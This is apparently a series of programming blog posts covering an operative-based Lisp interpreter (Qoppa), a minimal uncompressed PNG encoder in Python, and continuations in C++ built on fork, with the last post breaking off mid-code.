<pre class="sourceCode scheme"><code class="sourceCode scheme">(<span class="kw">lambda</span> (x) (<span class="kw">begin</span> a b c))</code></pre>
<p><code>begin</code> evaluates its arguments in order left to right, and returns the value of the last one. In Scheme it's a special form, because normal argument evaluation happens in an undefined order. By contrast, the Qoppa interpreter implements a left-to-right order, so we'll define <code>begin</code> as a function.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define last (lambda (xs)
(if (<span class="kw">null?</span> (<span class="kw">cdr</span> xs))
(<span class="kw">car</span> xs)
(last (<span class="kw">cdr</span> xs)))))
(define begin (lambda xs (last xs)))</code></pre>
<p>Now we can mutate the binding for <code>lambda</code> to support multiple expressions.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define set! (<span class="kw">vau</span> (name exp) env
(<span class="kw">set-cdr!</span>
(<span class="kw">lookup</span> name env)
(list (<span class="kw">eval</span> env exp)))))
(set! lambda
((lambda (base-lambda)
(<span class="kw">vau</span> (param . body) env
(<span class="kw">eval</span> env (list base-lambda param (<span class="kw">cons</span> begin body)))))
lambda))</code></pre>
<p>Note the structure</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">((lambda (base-lambda) ...) lambda)</code></pre>
<p>which holds on to the original <code>lambda</code> operative, in a private frame. That's right, we're using <code>lambda</code> to save <code>lambda</code> so we can overwrite <code>lambda</code>. We use the same approach when defining other sugar, such as the implicit <code>lambda</code> in <code>define</code>.</p>
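<p>The save-then-overwrite trick reads naturally in Python, where a closure keeps the old definition alive (the names here are illustrative, not part of the Qoppa code):</p>

```python
def base_version(x):           # stands in for the original `lambda` operative
    return x + 1

def extend(saved):
    # `saved` plays the role of the `base-lambda` parameter: a private
    # binding holding the old definition.
    def new_version(x):
        return saved(x) * 10   # delegate to the saved original, then add sugar
    return new_version

base_version = extend(base_version)   # overwrite; the old one lives on
assert base_version(1) == 20          # (1 + 1) * 10
```

After the reassignment the global name points at the new definition, but the closure still reaches the original through its own frame, just like the private frame created by <code>((lambda (base-lambda) ...) lambda)</code>.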
<p>There are some more bits of Scheme we need to implement: <code>cond</code>, <code>let</code>, <code>map</code>, <code>append</code>, and so forth. These are mostly straightforward; read the code if you want the full story. By far the most troublesome was Scheme's <code>apply</code> function, which takes a function and a list of arguments, and is supposed to apply the function to those arguments. The problem is that our functions are really operatives, and expect to call <code>eval</code> on each of their arguments. If we already have the values in a list, how do we pass them on?</p>
<p>Qoppa and Kernel have very different solutions to this problem. In Kernel, "applicatives" (things that evaluate all their arguments) are a distinct type from operatives. <code>wrap</code> is the primitive constructor of applicatives, and its inverse <code>unwrap</code> is used to implement <code>apply</code>. This design choice simplifies <code>apply</code> but complicates the core evaluator, which needs to distinguish applicatives from operatives.</p>
<p>For Qoppa I implemented <code>wrap</code> as a library function, which we saw before. But then we don't have <code>unwrap</code>. So <code>apply</code> takes the uglier approach of quoting each argument to prevent double-evaluation.</p>
<pre class="sourceCode qoppa"><code class="sourceCode qoppa">(define apply (wrap (<span class="kw">vau</span> (operative args) env
(<span class="kw">eval</span> env (<span class="kw">cons</span>
operative
(map (lambda (x) (list quote x)) args))))))</code></pre>
<p>In either Kernel or Qoppa, you're not allowed to apply <code>apply</code> to something that doesn't evaluate all of its arguments.</p>
<h1 id="testing">Testing</h1>
<p>The code we saw above is split into two files:</p>
<ul class="incremental">
<li><p><a href="https://github.com/kmcallister/qoppa/blob/master/qoppa.scm"><code>qoppa.scm</code></a> is the Qoppa interpreter, written in Scheme</p></li>
<li><p><a href="https://github.com/kmcallister/qoppa/blob/master/prelude.qop"><code>prelude.qop</code></a> is the Qoppa code which defines <code>wrap</code>, <code>lambda</code>, etc.</p></li>
</ul>
<p>I defined a procedure <code>execute-file</code> which reads a file from disk and runs each expression through <code>m-eval</code>. The last line of <code>qoppa.scm</code> is</p>
<pre class="sourceCode scheme"><code class="sourceCode scheme">(execute-file <span class="st">"prelude.qop"</span>)</code></pre>
<p>so the definitions in <code>prelude.qop</code> are available immediately.</p>
<p>We start by loading <code>qoppa.scm</code> into a Scheme interpreter. I'm using <a href="http://www.gnu.org/software/guile/">Guile</a> here, but I've actually tested this with a variety of <a href="http://www.schemers.org/Documents/Standards/R5RS/">R5RS</a> implementations.</p>
<pre><code><span class="Prompt">$</span> <span class="Entry">guile -l qoppa.scm</span>
<span class="Prompt">guile></span> <span class="Entry">(m-eval global-env '(fact 5))</span>
$1 = 120</code></pre>
<p>This establishes that we've implemented the features used by <code>fact</code>, such as <code>define</code> and <code>lambda</code>. But did we actually implement enough to run the Qoppa interpreter? To test this, we need to go deeper.</p>
<pre><code><span class="Prompt">guile></span> <span class="Entry">(execute-file "qoppa.scm")</span>
$2 = done
<span class="Prompt">guile></span> <span class="Entry">(m-eval global-env '(m-eval global-env '(fact 5)))</span>
$3 = 120</code></pre>
<p>This is factorial implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme, implemented as a library for Qoppa, implemented in Scheme (implemented in C). Of course it's outrageously slow; on my machine this <code>(fact 5)</code> takes about 5 minutes. But it demonstrates that a tiny language of operatives, augmented with an appropriate library, can provide enough syntactic features to run a non-trivial Scheme program. As for how to do this <em>efficiently</em>, well, I haven't got far enough into the literature to have any idea.</p>
keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com38
tag:blogger.com,1999:blog-1563623855220143059.post-17756828180735101432012-04-05T01:24:00.000-07:002012-04-05T01:24:01.822-07:00
A minimal encoder for uncompressed PNGs
<p>I've often wondered how hard it is to output a <a href="http://en.wikipedia.org/wiki/Portable_Network_Graphics">PNG</a> file directly, without using a library or a standard tool like <a href="http://netpbm.sourceforge.net/"><code>pnmtopng</code></a>. (I'm not sure when you'd actually want to do this; maybe for a tiny embedded system with a web interface.)</p>
<p>I found that constructing a simple, uncompressed PNG does not require a whole lot of code, but there are some odd details I got wrong on the first try. Here's a crash course in writing a minimal PNG encoder. We'll use only a small subset of <a href="http://www.w3.org/TR/PNG/">the PNG specification</a>, but I'll link to the full spec so you can read more.</p>
<p>The example code is not too fast; it's written in Python and has tons of string copying everywhere. My goal was to express the idea clearly, and let you worry about coding it up in C for your embedded system or whatever. If you're careful, you can avoid ever copying the image data.</p>
<p>We will assume the raw image data is a Python byte string (non-Unicode), consisting of one byte each for red, green, and blue, for each pixel in English reading order. For reference, here is how we'd "encode" this data in the much simpler <a href="http://manpages.ubuntu.com/manpages/oneiric/man5/ppm.5.html">PPM</a> format.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> to_ppm(width, height, data):<br /> <span class="kw">return</span> <span class="st">'P6</span><span class="ch">\n</span><span class="ot">%d</span><span class="st"> </span><span class="ot">%d</span><span class="ch">\n</span><span class="st">255</span><span class="ch">\n</span><span class="ot">%s</span><span class="st">'</span> % (width, height, data)</code></pre>
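<p>This post's examples are Python 2 (byte strings, <code>xrange</code>). For reference, a Python 3 equivalent of this "encoder" — where the raw image data is a <code>bytes</code> object — might look like:</p>

```python
def to_ppm(width, height, data):
    # binary PPM: ASCII "P6" header (width, height, max sample value),
    # followed immediately by the raw RGB bytes
    header = 'P6\n%d %d\n255\n' % (width, height)
    return header.encode('ascii') + data

# two pixels: one red, one green
ppm = to_ppm(2, 1, b'\xff\x00\x00\x00\xff\x00')
```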
<p>I lied when I said we'd use no libraries at all. I will import Python's standard <a href="http://docs.python.org/library/struct.html"><code>struct</code></a> module. I figured an exercise in converting integers to 4-byte <a href="http://en.wikipedia.org/wiki/Endianness">big endian</a> format would be excessively boring. Here's how we do it with <code>struct</code>.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="ch">import</span> struct<br /><br /><span class="kw">def</span> be32(n):<br /> <span class="kw">return</span> struct.pack(<span class="st">'>I'</span>, n)</code></pre>
<p>A PNG file contains a sequence of <a href="http://www.w3.org/TR/PNG/#5Chunk-layout">data chunks</a>, each with an associated length, type, and <a href="http://www.w3.org/TR/PNG/#5CRC-algorithm">CRC checksum</a>. The type is a 4-byte quantity which can be <a href="http://www.w3.org/TR/PNG/#5Chunk-naming-conventions">interpreted</a> as four ASCII letters. We'll implement <code>crc</code> later.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> png_chunk(ty, data):<br /> <span class="kw">return</span> be32(<span class="dt">len</span>(data)) + ty + data + be32(crc(ty + data))</code></pre>
<p>The <a href="http://www.w3.org/TR/PNG/#11IHDR"><code>IHDR</code> chunk</a>, always the first chunk in a file, contains basic header information such as width and height. We will hardcode a color depth of 8 bits, <a href="http://www.w3.org/TR/PNG/#6Colour-values">color type</a> 2 (RGB truecolor), and standard 0 values for the other fields.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> png_header(width, height):<br /> <span class="kw">return</span> png_chunk(<span class="st">'IHDR'</span>,<br /> struct.pack(<span class="st">'>IIBBBBB'</span>, width, height, <span class="dv">8</span>, <span class="dv">2</span>, <span class="dv">0</span>, <span class="dv">0</span>, <span class="dv">0</span>))</code></pre>
<p>The actual image data is stored in <a href="http://www.ietf.org/rfc/rfc1951.txt">DEFLATE</a> format, the same compression used by <a href="http://en.wikipedia.org/wiki/Gzip">gzip</a> and friends. Fortunately for our minimalist project, DEFLATE allows uncompressed blocks. Each one has a 5-byte header: the byte <code>0</code> (or <code>1</code> for the last block), followed by a 16-bit data length, and then the same length value with all of the bits flipped. Note that these are <em>little-endian</em> numbers, unlike the rest of PNG. Never assume a format is internally consistent!</p>
<pre class="sourceCode"><code class="sourceCode python">MAX_DEFLATE = <span class="bn">0xffff</span><br /><span class="kw">def</span> deflate_block(data, last=<span class="ot">False</span>):<br /> n = <span class="dt">len</span>(data)<br /> <span class="kw">assert</span> n <= MAX_DEFLATE<br /> <span class="kw">return</span> struct.pack(<span class="st">'<BHH'</span>, <span class="dt">bool</span>(last), n, <span class="bn">0xffff</span> ^ n) + data</code></pre>
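<p>To make the header concrete, here's the framing of a two-byte final block (a Python 3 sketch of the same function):</p>

```python
import struct

def deflate_block(data, last=False):
    # 5-byte header: final-block flag, little-endian length,
    # then the length with all of its bits flipped
    n = len(data)
    assert n <= 0xffff
    return struct.pack('<BHH', bool(last), n, 0xffff ^ n) + data

block = deflate_block(b'hi', last=True)
# bytes: 01 (final block), 02 00 (length 2, little-endian),
#        fd ff (complemented length), then 'hi'
```

<p>Python's <code>zlib.decompress(block, -15)</code> (a negative <code>wbits</code> means a raw DEFLATE stream with no zlib wrapper) will inflate this back to <code>b'hi'</code>.</p>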
<p>Since an uncompressed DEFLATE block can hold at most 65,535 bytes (the length field is 16 bits), we'll need to split our image data into multiple blocks. We will actually want a more general function to <a href="http://code.activestate.com/recipes/496784-split-string-into-n-size-pieces/">split a sequence</a> into chunks of size <code>n</code> (allowing the last chunk to be smaller than <code>n</code>).</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> pieces(seq, n):<br /> <span class="kw">return</span> [seq[i:i+n] <span class="kw">for</span> i in <span class="dt">xrange</span>(<span class="dv">0</span>, <span class="dt">len</span>(seq), n)]</code></pre>
<p>PNG wants the DEFLATE blocks to be encapsulated as a <a href="http://www.ietf.org/rfc/rfc1950.txt">zlib data stream</a>. For our purposes, this means we prefix a header of <code>78 01</code> hex, and suffix an <a href="http://en.wikipedia.org/wiki/Adler-32">Adler-32 checksum</a> of the "decompressed" data. That's right, a self-contained PNG encoder needs to implement <em>two different</em> checksum algorithms.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> zlib_stream(data):<br /> segments = pieces(data, MAX_DEFLATE)<br /><br /> blocks = <span class="st">''</span>.join(deflate_block(p) <span class="kw">for</span> p in segments[:-<span class="dv">1</span>])<br /> blocks += deflate_block(segments[-<span class="dv">1</span>], last=<span class="ot">True</span>)<br /><br /> <span class="kw">return</span> <span class="st">'</span><span class="ch">\x78\x01</span><span class="st">'</span> + blocks + be32(adler32(data))</code></pre>
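<p>Assuming Python's standard <code>zlib</code> module is available, we can sanity-check this framing: a stream built from stored blocks should round-trip through <code>zlib.decompress</code>. This Python 3 sketch borrows <code>zlib.adler32</code> for the trailer (the hand-rolled version appears later in the post):</p>

```python
import struct
import zlib

MAX_DEFLATE = 0xffff

def deflate_block(data, last=False):
    # uncompressed DEFLATE block: flag, little-endian length, complemented length
    n = len(data)
    return struct.pack('<BHH', bool(last), n, 0xffff ^ n) + data

def pieces(seq, n):
    return [seq[i:i+n] for i in range(0, len(seq), n)]

def zlib_stream(data):
    segments = pieces(data, MAX_DEFLATE)
    blocks = b''.join(deflate_block(p) for p in segments[:-1])
    blocks += deflate_block(segments[-1], last=True)
    # 78 01 header, stored blocks, big-endian Adler-32 of the raw data
    return b'\x78\x01' + blocks + struct.pack('>I', zlib.adler32(data))

payload = bytes(range(256)) * 1024   # 256 kB, so several blocks are needed
recovered = zlib.decompress(zlib_stream(payload))
```

<p>If <code>decompress</code> accepts the stream without complaint, both the block framing and the checksum trailer are well-formed.</p>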
<p>We're almost done, but there's one more wrinkle. PNG has a pre-compression <a href="http://www.w3.org/TR/PNG/#9Filters">filter</a> step, which transforms the image data one scanline at a time. A filter doesn't change the size of the image data, but it's supposed to expose redundancies, leading to better compression. We aren't compressing anyway, so we choose the no-op filter. This means we prefix a zero byte to each scanline.</p>
<p>At last we can build the PNG file. It consists of the <a href="http://www.w3.org/TR/PNG/#5PNG-file-signature">magic PNG signature</a>, a header chunk, our zlib stream inside an <a href="http://www.w3.org/TR/PNG/#11IDAT"><code>IDAT</code> chunk</a>, and an empty <a href="http://www.w3.org/TR/PNG/#11IEND"><code>IEND</code> chunk</a> to mark the end of the file.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> to_png(width, height, data):<br /> lines = <span class="st">''</span>.join(<span class="st">'\0'</span>+p <span class="kw">for</span> p in pieces(data, <span class="dv">3</span>*width))<br /><br /> <span class="kw">return</span> (<span class="st">'</span><span class="ch">\x89</span><span class="st">PNG</span><span class="ch">\r\n\x1a\n</span><span class="st">'</span><br /> + png_header(width, height)<br /> + png_chunk(<span class="st">'IDAT'</span>, zlib_stream(lines))<br /> + png_chunk(<span class="st">'IEND'</span>, <span class="st">''</span>))</code></pre>
<p>Actually, a PNG file may contain any number of <code>IDAT</code> chunks. The zlib stream is given by the concatenation of their contents. It might be convenient to emit one <code>IDAT</code> chunk per DEFLATE block. But the <code>IDAT</code> boundaries really <a href="http://www.w3.org/TR/PNG/#10CompressionFSL">can</a> occur anywhere, even halfway through the zlib checksum. This flexibility is convenient for encoders, and a hassle for decoders. For example, one of <a href="http://en.wikipedia.org/wiki/Portable_Network_Graphics#Web_browser_support_for_PNG">many historical PNG bugs</a> in Internet Explorer is triggered by <a href="http://support.microsoft.com/kb/897242">empty <code>IDAT</code> chunks</a>.</p>
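<p>The chunk-per-block layout suggested above might look like the following — a hypothetical Python 3 helper, not part of this post's encoder. Conveniently, <code>zlib.crc32</code> computes the same CRC-32 that PNG chunks use:</p>

```python
import struct
import zlib

def be32(n):
    return struct.pack('>I', n)

def png_chunk(ty, data):
    # length, type, payload, then CRC computed over type + payload
    return be32(len(data)) + ty + data + be32(zlib.crc32(ty + data))

def idat_chunks(deflate_blocks, adler):
    # zlib header in the first IDAT, one IDAT per DEFLATE block,
    # and the Adler-32 trailer in a final IDAT of its own
    chunks = [png_chunk(b'IDAT', b'\x78\x01')]
    chunks += [png_chunk(b'IDAT', block) for block in deflate_blocks]
    chunks.append(png_chunk(b'IDAT', adler))
    return b''.join(chunks)
```

<p>A decoder is required to concatenate all the <code>IDAT</code> payloads before inflating, so splitting at these boundaries is legal.</p>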
<p>Here are those checksum algorithms we need. My CRC function follows the approach of <a href="http://en.wikipedia.org/wiki/Computation_of_CRC#Bit_ordering_.28Endianness.29">code fragment 5</a> from Wikipedia. For better performance you would want to precompute a lookup table, as <a href="http://www.w3.org/TR/PNG/#D-CRCAppendix">suggested</a> by the PNG spec.</p>
<pre class="sourceCode"><code class="sourceCode python"><span class="kw">def</span> crc(data):<br /> c = <span class="bn">0xffffffff</span><br /> <span class="kw">for</span> x in data:<br /> c ^= <span class="dt">ord</span>(x)<br /> <span class="kw">for</span> k in <span class="dt">xrange</span>(<span class="dv">8</span>):<br /> v = <span class="bn">0xedb88320</span> <span class="kw">if</span> c & <span class="dv">1</span> <span class="kw">else</span> <span class="dv">0</span><br /> c = v ^ (c >> <span class="dv">1</span>)<br /> <span class="kw">return</span> c ^ <span class="bn">0xffffffff</span><br /><br /><span class="kw">def</span> adler32(data):<br /> s1, s2 = <span class="dv">1</span>, <span class="dv">0</span><br /> <span class="kw">for</span> x in data:<br /> s1 = (s1 + <span class="dt">ord</span>(x)) % <span class="dv">65521</span><br /> s2 = (s2 + s1) % <span class="dv">65521</span><br /> <span class="kw">return</span> (s2 << <span class="dv">16</span>) + s1</code></pre>
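<p>Assuming Python's standard <code>zlib</code> module, both hand-rolled checksums can be cross-checked against it, since <code>zlib.crc32</code> and <code>zlib.adler32</code> use the same parameters. (A Python 3 sketch: iterating over <code>bytes</code> yields integers directly, so <code>ord</code> goes away.)</p>

```python
import zlib

def crc(data):
    # PNG's CRC-32: init 0xffffffff, reflected polynomial 0xedb88320, final XOR
    c = 0xffffffff
    for x in data:
        c ^= x
        for _ in range(8):
            c = (0xedb88320 if c & 1 else 0) ^ (c >> 1)
    return c ^ 0xffffffff

def adler32(data):
    # Adler-32: two running sums modulo 65521 (the largest prime below 2**16)
    s1, s2 = 1, 0
    for x in data:
        s1 = (s1 + x) % 65521
        s2 = (s2 + s1) % 65521
    return (s2 << 16) + s1

sample = b'IHDR' + bytes(range(16))
```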
<p>Now we can test this code. We'll generate a grid of red-green-yellow gradients, and write it in both PPM and PNG formats.</p>
<pre class="sourceCode"><code class="sourceCode python">w, h = <span class="dv">500</span>, <span class="dv">300</span><br />img = <span class="st">''</span><br /><span class="kw">for</span> y in <span class="dt">xrange</span>(h):<br /> <span class="kw">for</span> x in <span class="dt">xrange</span>(w):<br /> img += <span class="dt">chr</span>(x % <span class="dv">256</span>) + <span class="dt">chr</span>(y % <span class="dv">256</span>) + <span class="st">'\0'</span><br /><br /><span class="dt">open</span>(<span class="st">'out.ppm'</span>, <span class="st">'wb'</span>).write(to_ppm(w, h, img))<br /><span class="dt">open</span>(<span class="st">'out.png'</span>, <span class="st">'wb'</span>).write(to_png(w, h, img))</code></pre>
<p>Then we can verify that the two files contain identical image data.</p>
<pre><code>$ pngtopnm out.png | sha1sum - out.ppm
e19c1229221c608b2a45a4488f9959403b8630a0 -
e19c1229221c608b2a45a4488f9959403b8630a0 out.ppm
</code></pre>
<p>That's it! As usual, the code is on <a href="https://github.com/kmcallister/blog-misc/tree/master/minpng/minpng.py">GitHub</a>. You can also read what others have written on similar subjects <a href="http://drj11.wordpress.com/2007/11/20/a-use-for-uncompressed-pngs/">here</a>, <a href="https://github.com/jrmuizel/minpng">here</a>, <a href="http://gareth-rees.livejournal.com/9988.html">here</a>, or <a href="http://www.chrfr.de/software/midp_png.html">here</a>.</p>
keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com110
tag:blogger.com,1999:blog-1563623855220143059.post-60315464477918898852012-02-14T01:26:00.000-08:002015-01-11T22:18:20.297-08:00
Continuations in C++ with fork
<p>[Update, Jan 2015: I've <a href="https://github.com/kmcallister/forkallcc">translated this code into Rust</a>.]</p>
<p>While reading "<a href="http://homepage.mac.com/sigfpe/Computing/continuations.html">Continuations in C</a>" I came across an intriguing idea:</p>
<blockquote>
<p>It is possible to simulate <code>call/cc</code>, or something like it, on Unix systems with system calls like <code>fork()</code> that literally duplicate the running process.</p>
</blockquote>
<p>The author sets this idea aside, and instead discusses some code that uses <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/setjmp.3.html"><code>setjmp</code></a>/<a href="http://www.kernel.org/doc/man-pages/online/pages/man3/longjmp.3.html"><code>longjmp</code></a> and stack copying. And there are several other <a href="http://en.wikipedia.org/wiki/Continuation">continuation</a>-like constructs available for C, such as POSIX <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/getcontext.2.html"><code>getcontext</code></a>. But the idea of implementing <a href="http://en.wikipedia.org/wiki/Call-with-current-continuation"><code>call/cc</code></a> with <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/fork.2.html"><code>fork</code></a> stuck with me, if only for its amusement value. I'd seen <code>fork</code> used for <a href="http://okmij.org/ftp/continuations/shift-v-fork.html#implementation-C">computing with probability distributions</a>, but I couldn't find an implementation of <code>call/cc</code> itself. So I decided to give it a shot, using my favorite <a href="http://esoteric.voxelperfect.net/wiki/Main_Page">esolang</a>, C++.</p>
<p>Continuations are a famously mind-bending idea, and this article doesn't totally explain what they are or what they're good for. If you aren't familiar with continuations, you might catch on from the examples, or you might want to consult another source first (<a href="http://en.wikipedia.org/wiki/Continuation">1</a>, <a href="http://www.madore.org/~david/computers/callcc.html">2</a>, <a href="http://community.schemewiki.org/?call-with-current-continuation">3</a>, <a href="http://community.schemewiki.org/?call-with-current-continuation-for-C-programmers">4</a>, <a href="http://www.ps.uni-saarland.de/~duchier/python/continuations.html">5</a>, <a href="http://web.mit.edu/alexmv/6.S184/l7-continuations.pdf">6</a>).</p>
<h1 id="small-examples">Small examples</h1>
<p>I'll get to the implementation later, but right now let's see what these <code>fork</code>-based continuations can do. The interface looks like this.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="kw">template</span> <<span class="kw">typename</span> T><br /><span class="kw">class</span> cont {<br /><span class="kw">public</span>:<br /> <span class="dt">void</span> <span class="kw">operator</span>()(<span class="dt">const</span> T &x);<br />};<br /><br /><span class="kw">template</span> <<span class="kw">typename</span> T><br />T call_cc( std::function< T (cont<T>) > f );</code></pre>
<p><a href="http://en.cppreference.com/w/cpp/utility/functional/function"><code>std::function</code></a> is a wrapper that can hold function-like values, such as function objects or C-style function pointers. So <code>call_cc<T></code> will accept any function-like value that takes an argument of type <code>cont<T></code> and returns a value of type <code>T</code>. This wrapper is the first of several <a href="http://en.wikipedia.org/wiki/C%2B%2B11">C++11</a> features we'll use.</p>
<p><code>call_cc</code> stands for "call with current continuation", and that's exactly what it does. <code>call_cc(f)</code> will call <code>f</code>, and return whatever <code>f</code> returns. The interesting part is that it passes to <code>f</code> an instance of our <code>cont</code> class, which represents all the stuff that's going to happen in the program after <code>f</code> returns. That <code>cont</code> object overloads <code>operator()</code> and so can be called like a function. If it's called with some argument <code>x</code>, the program behaves as though <code>f</code> had returned <code>x</code>.</p>
<p>The types reflect this usage. The type parameter <code>T</code> in <code>cont<T></code> is the return type of the function passed to <code>call_cc</code>. It's also the type of values accepted by <code>cont<T>::operator()</code>.</p>
<p>Here's a small example.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> f(cont<<span class="dt">int</span>> k) {<br /> std::cout << <span class="st">"f called"</span> << std::endl;<br /> k(<span class="dv">1</span>);<br /> std::cout << <span class="st">"k returns"</span> << std::endl;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}<br /><br /><span class="dt">int</span> main() {<br /> std::cout << <span class="st">"f returns "</span> << call_cc<<span class="dt">int</span>>(f) << std::endl;<br />}</code></pre>
<p>When we run this code we get:</p>
<pre><code>f called
f returns 1
</code></pre>
<p>We don't see the "<code>k returns</code>" message. Instead, calling <code>k(1)</code> bails out of <code>f</code> early, and forces it to return 1. This would happen even if we passed <code>k</code> to some deeply nested function call, and invoked it there.</p>
<p>This nonlocal return is kind of like throwing an exception, and is not that surprising. More exciting things happen if a continuation outlives the function call it came from.</p>
<pre class="sourceCode"><code class="sourceCode cpp">boost::optional< cont<<span class="dt">int</span>> > global_k;<br /><br /><span class="dt">int</span> g(cont<<span class="dt">int</span>> k) {<br /> std::cout << <span class="st">"g called"</span> << std::endl;<br /> global_k = k;<br /> <span class="kw">return</span> <span class="dv">0</span>;<br />}<br /><br /><span class="dt">int</span> main() {<br /> std::cout << <span class="st">"g returns "</span> << call_cc<<span class="dt">int</span>>(g) << std::endl;<br /><br /> <span class="kw">if</span> (global_k)<br /> (*global_k)(<span class="dv">1</span>);<br />}</code></pre>
<p>When we run this, we get:</p>
<pre><code>g called
g returns 0
g returns 1
</code></pre>
<p><code>g</code> is called once, and returns twice! When called, <code>g</code> saves the current continuation in a global variable. After <code>g</code> returns, <code>main</code> calls that continuation, and <code>g</code> returns again with a different value.</p>
<p>What value should <code>global_k</code> have before <code>g</code> is called? There's no such thing as a "default" or "uninitialized" <code>cont<T></code>. We solve this problem by wrapping it with <a href="http://www.boost.org/libs/optional/index.html"><code>boost::optional</code></a>. We use the resulting object much like a pointer, checking for "null" and then dereferencing. The difference is that <code>boost::optional</code> manages storage for the underlying value, if any.</p>
<p>Why isn't this code an infinite loop? Because <strong>invoking a <code>cont<T></code> also resets global state</strong> to the values it had when the continuation was captured. The second time <code>g</code> returns, <code>global_k</code> has been reset to the "null" <code>optional</code> value. This is <strong>unlike Scheme's <code>call/cc</code> and most other continuation systems</strong>. It turns out to be a serious limitation, though it's sometimes convenient. The reason for this behavior is that invoking a continuation is implemented as a transfer of control to another process. More on that later.</p>
<h1 id="backtracking">Backtracking</h1>
<p>We can use continuations to implement backtracking, as found in <a href="http://en.wikipedia.org/wiki/Logic_programming">logic programming</a> languages. Here is a suitable interface.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">bool</span> guess();<br /><span class="dt">void</span> fail();</code></pre>
<p>We will use <code>guess</code> as though it has a magical ability to predict the future. We assume it will only return <code>true</code> if doing so results in a program that never calls <code>fail</code>. Here is the implementation.</p>
<pre class="sourceCode"><code class="sourceCode cpp">boost::optional< cont<<span class="dt">bool</span>> > checkpoint;<br /><br /><span class="dt">bool</span> guess() {<br /> <span class="kw">return</span> call_cc<<span class="dt">bool</span>>( [](cont<<span class="dt">bool</span>> k) {<br /> checkpoint = k;<br /> <span class="kw">return</span> <span class="kw">true</span>;<br /> } );<br />}<br /><br /><span class="dt">void</span> fail() {<br /> <span class="kw">if</span> (checkpoint) {<br /> (*checkpoint)(<span class="kw">false</span>);<br /> } <span class="kw">else</span> {<br /> std::cerr << <span class="st">"Nothing to be done."</span> << std::endl;<br /> exit(<span class="dv">1</span>);<br /> }<br />}</code></pre>
<p><code>guess</code> invokes <code>call_cc</code> on a <a href="http://en.wikipedia.org/wiki/Anonymous_function#C.2B.2B">lambda expression</a>, which saves the current continuation and returns <code>true</code>. A subsequent call to <code>fail</code> will invoke this continuation, retrying execution in a world where <code>guess</code> had returned <code>false</code> instead. In Scheme et al, we would store a whole stack of continuations. But invoking our <code>cont<bool></code> resets global state, including the <code>checkpoint</code> variable itself, so we only need to explicitly track the most recent continuation.</p>
<p>Now we can implement the integer factoring example from "<a href="http://homepage.mac.com/sigfpe/Computing/continuations.html">Continuations in C</a>".</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">int</span> integer(<span class="dt">int</span> m, <span class="dt">int</span> n) {<br /> <span class="kw">for</span> (<span class="dt">int</span> i=m; i<=n; i++) {<br /> <span class="kw">if</span> (guess())<br /> <span class="kw">return</span> i;<br /> }<br /> fail();<br />}<br /><br /><span class="dt">void</span> factor(<span class="dt">int</span> n) {<br /> <span class="dt">const</span> <span class="dt">int</span> i = integer(<span class="dv">2</span>, <span class="dv">100</span>);<br /> <span class="dt">const</span> <span class="dt">int</span> j = integer(<span class="dv">2</span>, <span class="dv">100</span>);<br /><br /> <span class="kw">if</span> (i*j != n)<br /> fail();<br /><br /> std::cout << i << <span class="st">" * "</span> << j << <span class="st">" = "</span> << n << std::endl;<br />}</code></pre>
<p><code>factor(n)</code> will guess two integers, and fail if their product is not <code>n</code>. Calling <code>factor(391)</code> will produce the output</p>
<pre><code>17 * 23 = 391
</code></pre>
<p>after a moment's delay. In fact, you might see this <em>after</em> your shell prompt has returned, because the output is produced by a thousand-generation descendant of the process your shell created.</p>
<h1 id="solving-a-maze">Solving a maze</h1>
<p>For a more substantial use of backtracking, let's solve a maze.</p>
<pre class="sourceCode"><code class="sourceCode cpp"><span class="dt">const</span> <span class="dt">int</span> maze_size = <span class="dv">15</span>;<br /><span class="dt">char</span> maze[] =<br /> <span class="st">"X-------------+</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">" | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"|--+ | | | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | | | --+ |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"|-+---+--+- | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | | ---+-+- |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| +-+-+--| |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | | |--- |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| | |</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"|--- -+-------|</span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"| </span><span class="ch">\n</span><span class="st">"</span><br /> <span class="st">"+------------- </span><span class="ch">\n</span><span class="st">"</span>;<br /><br /><span class="dt">void</span> solve_maze() {<br /> <span class="dt">int</span> x=<span class="dv">0</span>, y=<span class="dv">0</span>;<br /><br /> <span class="kw">while</span> ((x != maze_size<span class="dv">-1</span>)<br /> || (y != maze_size<span class="dv">-1</span>)) {<br /><br /> <span class="kw">if</span> (guess()) x++;<br /> <span class="kw">else</span> <span class="kw">if</span> 
